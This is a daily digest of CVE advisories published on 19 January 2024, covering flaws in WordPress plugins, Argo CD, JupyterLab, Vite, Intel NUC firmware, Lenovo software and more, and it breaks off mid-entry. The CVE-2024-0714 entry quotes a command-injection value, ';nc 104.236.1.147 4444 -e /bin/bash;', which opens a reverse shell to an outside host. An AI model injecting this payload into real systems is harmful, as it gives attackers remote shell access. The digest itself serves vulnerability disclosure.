Latest vulnerabilities [Friday, January 19, 2024]

Latest vulnerabilities [Friday, January 19, 2024]
{{titre}}

Last update performed on 01/19/2024 at 11:57:07 PM

(2) CRITICAL VULNERABILITIES [9.0, 10.0]

Source : cert.org.tw

Vulnerability ID : CVE-2023-5716

First published on : 19-01-2024 04:15:09
Last modified on : 19-01-2024 15:56:26

Description :
ASUS Armoury Crate has a vulnerability in arbitrary file write and allows remote attackers to access or modify arbitrary files by sending specific HTTP requests without permission.

CVE ID : CVE-2023-5716
Source : twcert@cert.org.tw
CVSS Score : 9.8

References :
https://www.twcert.org.tw/tw/cp-132-7666-fffce-1.html | source : twcert@cert.org.tw

Vulnerability : CWE-610


Source : wordfence.com

Vulnerability ID : CVE-2024-0705

First published on : 19-01-2024 10:15:34
Last modified on : 19-01-2024 15:56:26

Description :
The Stripe Payment Plugin for WooCommerce plugin for WordPress is vulnerable to SQL Injection via the 'id' parameter in all versions up to, and including, 3.7.9 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.

CVE ID : CVE-2024-0705
Source : security@wordfence.com
CVSS Score : 9.8

References :
https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=2954934%40payment-gateway-stripe-and-woocommerce-integration&new=2954934%40payment-gateway-stripe-and-woocommerce-integration&sfp_email=&sfph_mail= | source : security@wordfence.com
https://www.wordfence.com/threat-intel/vulnerabilities/id/2652a7fc-b610-40f1-8b76-2129f59390ec?source=cve | source : security@wordfence.com


(17) HIGH VULNERABILITIES [7.0, 8.9]

Source : us.ibm.com

Vulnerability ID : CVE-2023-40683

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM OpenPages with Watson 8.3 and 9.0 could allow remote attacker to bypass security restrictions, caused by insufficient authorization checks. By authenticating as an OpenPages user and using non-public APIs, an attacker could exploit this vulnerability to bypass security and gain unauthorized administrative access to the application. IBM X-Force ID: 264005.

CVE ID : CVE-2023-40683
Source : psirt@us.ibm.com
CVSS Score : 8.8

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/264005 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107774 | source : psirt@us.ibm.com

Vulnerability : CWE-264


Source : github.com

Vulnerability ID : CVE-2024-22424

First published on : 19-01-2024 01:15:09
Last modified on : 19-01-2024 01:51:14

Description :
Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. The Argo CD API prior to versions 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15 are vulnerable to a cross-server request forgery (CSRF) attack when the attacker has the ability to write HTML to a page on the same parent domain as Argo CD. A CSRF attack works by tricking an authenticated Argo CD user into loading a web page which contains code to call Argo CD API endpoints on the victim’s behalf. For example, an attacker could send an Argo CD user a link to a page which looks harmless but in the background calls an Argo CD API endpoint to create an application running malicious code. Argo CD uses the “Lax” SameSite cookie policy to prevent CSRF attacks where the attacker controls an external domain. The malicious external website can attempt to call the Argo CD API, but the web browser will refuse to send the Argo CD auth token with the request. Many companies host Argo CD on an internal subdomain. If an attacker can place malicious code on, for example, https://test.internal.example.com/, they can still perform a CSRF attack. In this case, the “Lax” SameSite cookie does not prevent the browser from sending the auth cookie, because the destination is a parent domain of the Argo CD API. Browsers generally block such attacks by applying CORS policies to sensitive requests with sensitive content types. Specifically, browsers will send a “preflight request” for POSTs with content type “application/json” asking the destination API “are you allowed to accept requests from my domain?” If the destination API does not answer “yes,” the browser will block the request. Before the patched versions, Argo CD did not validate that requests contained the correct content type header. So an attacker could bypass the browser’s CORS check by setting the content type to something which is considered “not sensitive” such as “text/plain.” The browser wouldn’t send the preflight request, and Argo CD would happily accept the contents (which are actually still JSON) and perform the requested action (such as running malicious code). A patch for this vulnerability has been released in the following Argo CD versions: 2.10-rc2, 2.9.4, 2.8.8, and 2.7.15. The patch contains a breaking API change. The Argo CD API will no longer accept non-GET requests which do not specify application/json as their Content-Type. The accepted content types list is configurable, and it is possible (but discouraged) to disable the content type check completely. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-22424
Source : security-advisories@github.com
CVSS Score : 8.3

References :
https://github.com/argoproj/argo-cd/issues/2496 | source : security-advisories@github.com
https://github.com/argoproj/argo-cd/pull/16860 | source : security-advisories@github.com
https://github.com/argoproj/argo-cd/security/advisories/GHSA-92mw-q256-5vwg | source : security-advisories@github.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2024-22421

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. Users of JupyterLab who click on a malicious link may get their `Authorization` and `XSRFToken` tokens exposed to a third party when running an older `jupyter-server` version. JupyterLab versions 4.1.0b2, 4.0.11, and 3.6.7 are patched. No workaround has been identified, however users should ensure to upgrade `jupyter-server` to version 2.7.2 or newer which includes a redirect vulnerability fix.

CVE ID : CVE-2024-22421
Source : security-advisories@github.com
CVSS Score : 7.6

References :
https://github.com/jupyterlab/jupyterlab/commit/19bd9b96cb2e77170a67e43121637d0b5619e8c6 | source : security-advisories@github.com
https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-44cc-43rp-5947 | source : security-advisories@github.com

Vulnerability : CWE-200
Vulnerability : CWE-23


Vulnerability ID : CVE-2024-22422

First published on : 19-01-2024 01:15:09
Last modified on : 19-01-2024 01:51:14

Description :
AnythingLLM is an application that turns any document, resource, or piece of content into context that any LLM can use as references during chatting. In versions prior to commit `08d33cfd8` an unauthenticated API route (file export) can allow attacker to crash the server resulting in a denial of service attack. The “data-export” endpoint is used to export files using the filename parameter as user input. The endpoint takes the user input, filters it to avoid directory traversal attacks, fetches the file from the server, and afterwards deletes it. An attacker can trick the input filter mechanism to point to the current directory, and while attempting to delete it the server will crash as there is no error-handling wrapper around it. Moreover, the endpoint is public and does not require any form of authentication, resulting in an unauthenticated Denial of Service issue, which crashes the instance using a single HTTP packet. This issue has been addressed in commit `08d33cfd8`. Users are advised to upgrade. There are no known workarounds for this vulnerability.

CVE ID : CVE-2024-22422
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/Mintplex-Labs/anything-llm/commit/08d33cfd8fc47c5052b6ea29597c964a9da641e2 | source : security-advisories@github.com
https://github.com/Mintplex-Labs/anything-llm/security/advisories/GHSA-xmj6-g32r-fc5q | source : security-advisories@github.com

Vulnerability : CWE-754


Vulnerability ID : CVE-2024-23331

First published on : 19-01-2024 20:15:14
Last modified on : 19-01-2024 22:52:48

Description :
Vite is a frontend tooling framework for javascript. The Vite dev server option `server.fs.deny` can be bypassed on case-insensitive file systems using case-augmented versions of filenames. Notably this affects servers hosted on Windows. This bypass is similar to CVE-2023-34092 -- with surface area reduced to hosts having case-insensitive filesystems. Since `picomatch` defaults to case-sensitive glob matching, but the file server doesn't discriminate; a blacklist bypass is possible. By requesting raw filesystem paths using augmented casing, the matcher derived from `config.server.fs.deny` fails to block access to sensitive files. This issue has been addressed in vite@5.0.12, vite@4.5.2, vite@3.2.8, and vite@2.9.17. Users are advised to upgrade. Users unable to upgrade should restrict access to dev servers.

CVE ID : CVE-2024-23331
Source : security-advisories@github.com
CVSS Score : 7.5

References :
https://github.com/vitejs/vite/commit/91641c4da0a011d4c5352e88fc68389d4e1289a5 | source : security-advisories@github.com
https://github.com/vitejs/vite/security/advisories/GHSA-c24v-8rfc-w8vw | source : security-advisories@github.com
https://vitejs.dev/config/server-options.html#server-fs-deny | source : security-advisories@github.com

Vulnerability : CWE-178
Vulnerability : CWE-200
Vulnerability : CWE-284


Source : patchstack.com

Vulnerability ID : CVE-2022-40700

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Server-Side Request Forgery (SSRF) vulnerability in Montonio Montonio for WooCommerce, Wpopal Wpopal Core Features, AMO for WP – Membership Management ArcStone wp-amo, Long Watch Studio WooVirtualWallet – A virtual wallet for WooCommerce, Long Watch Studio WooVIP – Membership plugin for WordPress and WooCommerce, Long Watch Studio WooSupply – Suppliers, Supply Orders and Stock Management, Squidesma Theme Minifier, Paul Clark Styles styles, Designmodo Inc. WordPress Page Builder – Qards, Philip M. Hofer (Frumph) PHPFreeChat, Arun Basil Lal Custom Login Admin Front-end CSS, Team Agence-Press CSS Adder By Agence-Press, Unihost Confirm Data, deano1987 AMP Toolbox amp-toolbox, Arun Basil Lal Admin CSS MU.This issue affects Montonio for WooCommerce: from n/a through 6.0.1; Wpopal Core Features: from n/a through 1.5.8; ArcStone: from n/a through 4.6.6; WooVirtualWallet – A virtual wallet for WooCommerce: from n/a through 2.2.1; WooVIP – Membership plugin for WordPress and WooCommerce: from n/a through 1.4.4; WooSupply – Suppliers, Supply Orders and Stock Management: from n/a through 1.2.2; Theme Minifier: from n/a through 2.0; Styles: from n/a through 1.2.3; WordPress Page Builder – Qards: from n/a through 1.0.5; PHPFreeChat: from n/a through 0.2.8; Custom Login Admin Front-end CSS: from n/a through 1.4.1; CSS Adder By Agence-Press: from n/a through 1.5.0; Confirm Data: from n/a through 1.0.7; AMP Toolbox: from n/a through 2.1.1; Admin CSS MU: from n/a through 2.6.

CVE ID : CVE-2022-40700
Source : audit@patchstack.com
CVSS Score : 8.2

References :
https://patchstack.com/database/vulnerability/admin-css-mu/wordpress-admin-css-mu-plugin-2-6-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/amp-toolbox/wordpress-amp-toolbox-plugin-2-1-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/confirm-data/wordpress-confirm-data-plugin-1-0-7-unauth-server-side-request-forgery-ssrf-vulnerability?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/css-adder-by-agence-press/wordpress-css-adder-by-agene-press-plugin-1-5-0-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/custom-login-admin-front-end-css-with-multisite-support/wordpress-custom-login-admin-front-end-css-plugin-1-4-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/montonio-for-woocommerce/wordpress-montonio-for-woocommerce-plugin-6-0-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/phpfreechat/wordpress-phpfreechat-plugin-0-2-8-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/qards-free/wordpress-wordpress-page-builder-qards-plugin-1-0-5-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/styles/wordpress-styles-plugin-1-2-3-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/theme-minifier/wordpress-theme-minifier-plugin-2-0-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woosupply/wordpress-woosupply-plugin-1-2-2-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woovip/wordpress-woovip-plugin-1-4-4-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/woovirtualwallet/wordpress-woovirtualwallet-plugin-2-2-1-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/wp-amo/wordpress-amo-for-wp-plugin-4-6-6-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com
https://patchstack.com/database/vulnerability/wpopal-core-features/wordpress-wpopal-core-features-plugin-1-5-7-server-side-request-forgery-ssrf?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-918


Source : intel.com

Vulnerability ID : CVE-2023-32272

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Uncontrolled search path in some Intel NUC Pro Software Suite Configuration Tool software installers before version 3.0.0.6 may allow an authenticated user to potentially enable denial of service via local access.

CVE ID : CVE-2023-32272
Source : secure@intel.com
CVSS Score : 7.9

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-427


Vulnerability ID : CVE-2023-28738

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version JY0070 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28738
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-28743

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version QN0073 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28743
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-29495

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-29495
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-38587

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-38587
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-42429

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
Improper buffer restrictions in some Intel NUC BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-42429
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-92


Vulnerability ID : CVE-2023-42766

First published on : 19-01-2024 20:15:11
Last modified on : 19-01-2024 22:52:48

Description :
Improper input validation in some Intel NUC 8 Compute Element BIOS firmware may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-42766
Source : secure@intel.com
CVSS Score : 7.5

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01028.html | source : secure@intel.com

Vulnerability : CWE-20


Vulnerability ID : CVE-2023-32544

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Improper access control in some Intel HotKey Services for Windows 10 for Intel NUC P14E Laptop Element software installers before version 1.1.45 may allow an authenticated user to potentially enable denial of service via local access.

CVE ID : CVE-2023-32544
Source : secure@intel.com
CVSS Score : 7.3

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-284


Source : lenovo.com

Vulnerability ID : CVE-2023-6043

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker to bypass integrity checks and execute arbitrary code with elevated privileges.

CVE ID : CVE-2023-6043
Source : psirt@lenovo.com
CVSS Score : 7.8

References :
https://support.lenovo.com/us/en/product_security/LEN-144736 | source : psirt@lenovo.com

Vulnerability : CWE-295


Source : vuldb.com

Vulnerability ID : CVE-2024-0712

First published on : 19-01-2024 14:15:12
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in Beijing Baichuo Smart S150 Management Platform V31R02B15. It has been classified as critical. Affected is an unknown function of the file /useratte/inc/userattea.php. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251538 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0712
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://github.com/GTA12138/vul/blob/main/smart%20s150/2024-1-9%20smart%20s150%20101508.md | source : cna@vuldb.com
https://vuldb.com/?ctiid.251538 | source : cna@vuldb.com
https://vuldb.com/?id.251538 | source : cna@vuldb.com

Vulnerability : CWE-284


Vulnerability ID : CVE-2024-0739

First published on : 19-01-2024 22:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, was found in Hecheng Leadshop up to 1.4.20. Affected is an unknown function of the file /web/leadshop.php. The manipulation of the argument install leads to deserialization. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-251562 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0739
Source : cna@vuldb.com
CVSS Score : 7.3

References :
https://note.zhaoj.in/share/vLswXhWxUrs8 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251562 | source : cna@vuldb.com
https://vuldb.com/?id.251562 | source : cna@vuldb.com

Vulnerability : CWE-502


(32) MEDIUM VULNERABILITIES [4.0, 6.9]

Source : us.ibm.com

Vulnerability ID : CVE-2023-38738

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM OpenPages with Watson 8.3 and 9.0 could provide weaker than expected security in a OpenPages environment using Native authentication. If OpenPages is using Native authentication an attacker with access to the OpenPages database could through a series of specially crafted steps could exploit this weakness and gain unauthorized access to other OpenPages accounts. IBM X-Force ID: 262594.

CVE ID : CVE-2023-38738
Source : psirt@us.ibm.com
CVSS Score : 6.8

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/262594 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107775 | source : psirt@us.ibm.com

Vulnerability : CWE-257


Vulnerability ID : CVE-2023-50963

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Storage Defender - Data Protect 1.0.0 through 1.4.1 is vulnerable to HTTP header injection, caused by improper validation of input by the HOST headers. This could allow an attacker to conduct various attacks against the vulnerable system, including cross-site scripting, cache poisoning or session hijacking. IBM X-Force ID: 276101.

CVE ID : CVE-2023-50963
Source : psirt@us.ibm.com
CVSS Score : 6.5

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/276101 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7106918 | source : psirt@us.ibm.com

Vulnerability : CWE-601


Vulnerability ID : CVE-2023-35020

First published on : 19-01-2024 01:15:08
Last modified on : 19-01-2024 01:51:14

Description :
IBM Sterling Control Center 6.3.0 could allow a remote attacker to traverse directories on the system. An attacker could send a specially crafted URL request containing "dot dot" sequences (/../) to view arbitrary files on the system. IBM X-Force ID: 257874.

CVE ID : CVE-2023-35020
Source : psirt@us.ibm.com
CVSS Score : 5.4

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/257874 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107788 | source : psirt@us.ibm.com

Vulnerability : CWE-22


Vulnerability ID : CVE-2023-32337

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Maximo Spatial Asset Management 8.10 is vulnerable to server-side request forgery (SSRF). This may allow an authenticated attacker to send unauthorized requests from the system, potentially leading to network enumeration or facilitating other attacks. IBM X-Force ID: 255288.

CVE ID : CVE-2023-32337
Source : psirt@us.ibm.com
CVSS Score : 5.4

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/255288 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107712 | source : psirt@us.ibm.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-47718

First published on : 19-01-2024 02:15:07
Last modified on : 19-01-2024 15:56:26

Description :
IBM Maximo Asset Management 7.6.1.3 and Manage Component 8.10 through 8.11 is vulnerable to cross-site request forgery which could allow an attacker to execute malicious and unauthorized actions transmitted from a user that the website trusts. IBM X-Force ID: 271843.

CVE ID : CVE-2023-47718
Source : psirt@us.ibm.com
CVSS Score : 4.3

References :
https://exchange.xforce.ibmcloud.com/vulnerabilities/271843 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107738 | source : psirt@us.ibm.com
https://www.ibm.com/support/pages/node/7107740 | source : psirt@us.ibm.com

Vulnerability : CWE-352


Source : lenovo.com

Vulnerability ID : CVE-2023-5080

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in some Lenovo tablet products that could allow local applications access to device identifiers and system commands.

CVE ID : CVE-2023-5080
Source : psirt@lenovo.com
CVSS Score : 6.8

References :
https://support.lenovo.com/us/en/product_security/LEN-142135 | source : psirt@lenovo.com

Vulnerability : CWE-269


Vulnerability ID : CVE-2023-6044

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
A privilege escalation vulnerability was reported in Lenovo Vantage that could allow a local attacker with physical access to impersonate Lenovo Vantage Service and execute arbitrary code with elevated privileges.

CVE ID : CVE-2023-6044
Source : psirt@lenovo.com
CVSS Score : 6.3

References :
https://support.lenovo.com/us/en/product_security/LEN-144736 | source : psirt@lenovo.com

Vulnerability : CWE-290


Vulnerability ID : CVE-2023-6450

First published on : 19-01-2024 20:15:12
Last modified on : 19-01-2024 22:52:48

Description :
An incorrect permissions vulnerability was reported in the Lenovo App Store app that could allow an attacker to use system resources, resulting in a denial of service.

CVE ID : CVE-2023-6450
Source : psirt@lenovo.com
CVSS Score : 5.5

References :
https://iknow.lenovo.com.cn/detail/419672 | source : psirt@lenovo.com

Vulnerability : CWE-400


Source : intel.com

Vulnerability ID : CVE-2023-28722

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Improper buffer restrictions for some Intel NUC BIOS firmware before version IN0048 may allow a privileged user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-28722
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-01009.html | source : secure@intel.com

Vulnerability : CWE-92


Vulnerability ID : CVE-2023-29244

First published on : 19-01-2024 20:15:09
Last modified on : 19-01-2024 22:52:48

Description :
Incorrect default permissions in some Intel Integrated Sensor Hub (ISH) driver for Windows 10 for Intel NUC P14E Laptop Element software installers before version 5.4.1.4479 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-29244
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-276


Vulnerability ID : CVE-2023-38541

First published on : 19-01-2024 20:15:10
Last modified on : 19-01-2024 22:52:48

Description :
Insecure inherited permissions in some Intel HID Event Filter drivers for Windows 10 for some Intel NUC laptop software installers before version 2.2.2.1 may allow an authenticated user to potentially enable escalation of privilege via local access.

CVE ID : CVE-2023-38541
Source : secure@intel.com
CVSS Score : 6.7

References :
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00964.html | source : secure@intel.com

Vulnerability : CWE-277


Source : patchstack.com

Vulnerability ID : CVE-2022-45083

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Deserialization of Untrusted Data vulnerability in ProfilePress Membership Team Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress.This issue affects Paid Membership Plugin, Ecommerce, User Registration Form, Login Form, User Profile & Restrict Content – ProfilePress: from n/a through 4.3.2.

CVE ID : CVE-2022-45083
Source : audit@patchstack.com
CVSS Score : 6.6

References :
https://patchstack.com/database/vulnerability/wp-user-avatar/wordpress-profilepress-plugin-4-3-2-auth-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Vulnerability ID : CVE-2022-47160

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Wpmet Wp Social Login and Register Social Counter.This issue affects Wp Social Login and Register Social Counter: from n/a through 1.9.0.

CVE ID : CVE-2022-47160
Source : audit@patchstack.com
CVSS Score : 6.5

References :
https://patchstack.com/database/vulnerability/wp-social/wordpress-wp-social-plugin-1-9-0-auth-sensitive-information-disclosure-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2022-45845

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
Deserialization of Untrusted Data vulnerability in Nextend Smart Slider 3.This issue affects Smart Slider 3: from n/a through 3.5.1.9.

CVE ID : CVE-2022-45845
Source : audit@patchstack.com
CVSS Score : 4.3

References :
https://patchstack.com/database/vulnerability/smart-slider-3/wordpress-smart-slider-3-plugin-3-5-1-9-auth-php-object-injection-vulnerability?_s_id=cve | source : audit@patchstack.com

Vulnerability : CWE-502


Source : github.com

Vulnerability ID : CVE-2024-22420

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
JupyterLab is an extensible environment for interactive and reproducible computing, based on the Jupyter Notebook and Architecture. This vulnerability depends on user interaction by opening a malicious Markdown file using JupyterLab preview feature. A malicious user can access any data that the attacked user has access to as well as perform arbitrary requests acting as the attacked user. JupyterLab version 4.0.11 has been patched. Users are advised to upgrade. Users unable to upgrade should disable the table of contents extension.

CVE ID : CVE-2024-22420
Source : security-advisories@github.com
CVSS Score : 6.5

References :
https://github.com/jupyterlab/jupyterlab/commit/e1b3aabab603878e46add445a3114e838411d2df | source : security-advisories@github.com
https://github.com/jupyterlab/jupyterlab/security/advisories/GHSA-4m77-cmpx-vjc4 | source : security-advisories@github.com

Vulnerability : CWE-79


Source : vuldb.com

Vulnerability ID : CVE-2024-0714

First published on : 19-01-2024 15:15:08
Last modified on : 19-01-2024 15:56:19

Description :
A vulnerability was found in MiczFlor RPi-Jukebox-RFID up to 2.5.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file userScripts.php of the component HTTP Request Handler. The manipulation of the argument folder with the input ;nc 104.236.1.147 4444 -e /bin/bash; leads to os command injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251540. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.

CVE ID : CVE-2024-0714
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://vuldb.com/?ctiid.251540 | source : cna@vuldb.com
https://vuldb.com/?id.251540 | source : cna@vuldb.com

Vulnerability : CWE-78


Vulnerability ID : CVE-2024-0730

First published on : 19-01-2024 19:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability, which was classified as critical, was found in Project Worlds Online Time Table Generator 1.0. This affects an unknown part of the file course_ajax.php. The manipulation of the argument id leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251553 was assigned to this vulnerability.

CVE ID : CVE-2024-0730
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://torada.notion.site/SQL-injection-at-course_ajax-php-485d8cca5f8c43dfb1f76c7336a4a45e | source : cna@vuldb.com
https://vuldb.com/?ctiid.251553 | source : cna@vuldb.com
https://vuldb.com/?id.251553 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0733

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in Smsot up to 2.12. It has been classified as critical. Affected is an unknown function of the file /api.php of the component HTTP POST Request Handler. The manipulation of the argument data[sign] leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-251556.

CVE ID : CVE-2024-0733
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://note.zhaoj.in/share/3GznRo9vWRJ8 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251556 | source : cna@vuldb.com
https://vuldb.com/?id.251556 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0734

First published on : 19-01-2024 21:15:08
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in Smsot up to 2.12. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /get.php. The manipulation of the argument tid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-251557 was assigned to this vulnerability.

CVE ID : CVE-2024-0734
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://note.zhaoj.in/share/vo1KOw3EYmBK | source : cna@vuldb.com
https://vuldb.com/?ctiid.251557 | source : cna@vuldb.com
https://vuldb.com/?id.251557 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0735

First published on : 19-01-2024 21:15:09
Last modified on : 19-01-2024 22:52:48

Description :
A vulnerability was found in SourceCodester Online Tours & Travels Management System 1.0. It has been rated as critical. Affected by this issue is the function exec of the file admin/operations/expense.php. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-251558 is the identifier assigned to this vulnerability.

CVE ID : CVE-2024-0735
Source : cna@vuldb.com
CVSS Score : 6.3

References :
https://blog.csdn.net/DMZNX/article/details/135683738 | source : cna@vuldb.com
https://vuldb.com/?ctiid.251558 | source : cna@vuldb.com
https://vuldb.com/?id.251558 | source : cna@vuldb.com

Vulnerability : CWE-89


Vulnerability ID : CVE-2024-0738

First published on : 19-01-2024 22:15:07
Last modified on : 19-01-2024 22:52:48

Description :
